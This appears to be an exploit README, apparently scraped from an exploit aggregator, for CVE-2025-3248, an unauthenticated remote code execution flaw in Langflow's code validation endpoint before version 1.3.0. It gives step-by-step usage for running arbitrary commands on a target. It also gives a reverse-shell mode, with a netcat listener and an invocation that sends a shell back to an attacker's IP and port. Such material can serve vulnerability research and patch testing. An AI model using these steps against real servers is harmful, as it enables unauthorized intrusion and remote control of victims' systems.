Share
## https://sploitus.com/exploit?id=E98C6E2E-8AF6-5882-89C1-8B877898C868
# CVE-2025-3248 - Langflow Code Validation Endpoint RCE

A proof-of-concept exploit demonstrating a remote code execution vulnerability in Langflow's code validation endpoint. This vulnerability affects Langflow versions prior to 1.3.0, allowing unauthenticated attackers to execute arbitrary code through crafted HTTP requests.

## Vulnerability Details

- **CVE ID**: [CVE-2025-3248](https://nvd.nist.gov/vuln/detail/CVE-2025-3248)
- **Affected Versions**: < 1.3.0
- **Attack Vector**: Remote
- **Authentication Required**: No
- **Impact**: Remote Code Execution (RCE)
- **Endpoint**: `/api/v1/validate/code`

## Prerequisites

- Python 3.x
- Required Python packages:
  - `requests`
  - `colorama`

## Installation

1. Clone the repository:
```bash
git clone https://github.com/preemware/langflow-exploit
cd langflow-exploit
```

2. Install dependencies:
```bash
pip install requests colorama
```

## Usage

The exploit supports two modes of operation:

### 1. Command Execution Mode

Execute a single command on the target system:

```bash
python3 cve-2025-3248.py cmd <target_url> "<command>"
```

Example:
```bash
python3 cve-2025-3248.py cmd http://target:7860 "id"
```

### 2. Reverse Shell Mode

Spawn an interactive reverse shell:

1. First, start a listener on your machine:
```bash
nc -lvnp 4444
```

2. Then run the exploit:
```bash
python3 cve-2025-3248.py shell <target_url> <your_ip> <your_port>
```

Example:
```bash
python3 cve-2025-3248.py shell http://target:7860 10.0.0.5 4444
```